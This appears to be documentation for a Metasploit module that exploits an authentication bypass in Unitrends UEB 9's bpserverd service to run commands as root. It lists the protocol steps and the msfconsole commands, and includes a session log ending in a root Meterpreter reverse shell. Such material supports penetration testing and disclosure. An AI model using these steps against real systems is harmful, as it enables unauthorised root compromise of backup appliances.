## Vulnerable Application Unitrends UEB 9 bpserverd authentication bypass RCE This exploit uses roughly the same process to gain root execution as does the apache user on the Unitrends appliance. The process is something like this: 1. Connect to xinetd process (it's usually running on port 1743) 2. This process will send something like: `?A,Connect36092` 3. Initiate a second connection to the port specified in the packet from xinetd (36092 in this example) 4. send a specially crafted packet to xinetd, containing the command to be executed as root 5. Receive command output from the connection to port 36092 6. Close both connections ## Verification Steps 1. ```use exploit/linux/misc/ueb9_bpserverd ``` 2. ```set lhost [IP]``` 3. ```set rhost [IP]``` 4. ```exploit``` 5. A meterpreter session should have been opened successfully ## Scenarios ### UEB 9.1 on CentOS 6.5 ``` msf > use exploit/linux/misc/ueb9_bpserverd msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230 rhost => 10.0.0.230 msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141 lhost => 10.0.0.141 msf exploit(ueb9_bpserverd) > exploit [*] Started reverse TCP handler on 10.0.0.141:4444 [*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9.... [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... [+] 10.0.0.230:1743 - bpd port received: 45425 [*] 10.0.0.230:1743 - Connecting to 45425 [+] 10.0.0.230:1743 - Connected! [*] 10.0.0.230:1743 - Sending command buffer to xinetd [*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes) [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... [+] 10.0.0.230:1743 - bpd port received: 40889 [*] 10.0.0.230:1743 - Connecting to 40889 [+] 10.0.0.230:1743 - Connected! [*] 10.0.0.230:1743 - Sending command buffer to xinetd [*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes) [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... [+] 10.0.0.230:1743 - bpd port received: 40016 [*] 10.0.0.230:1743 - Connecting to 40016 [+] 10.0.0.230:1743 - Connected! [*] 10.0.0.230:1743 - Sending command buffer to xinetd [*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes) [*] 10.0.0.230:1743 - Connecting to xinetd for bpd port... [+] 10.0.0.230:1743 - bpd port received: 53649 [*] 10.0.0.230:1743 - Connecting to 53649 [+] 10.0.0.230:1743 - Connected! [*] 10.0.0.230:1743 - Sending command buffer to xinetd [*] Sending stage (826872 bytes) to 10.0.0.230 [*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400 [*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes) meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > ```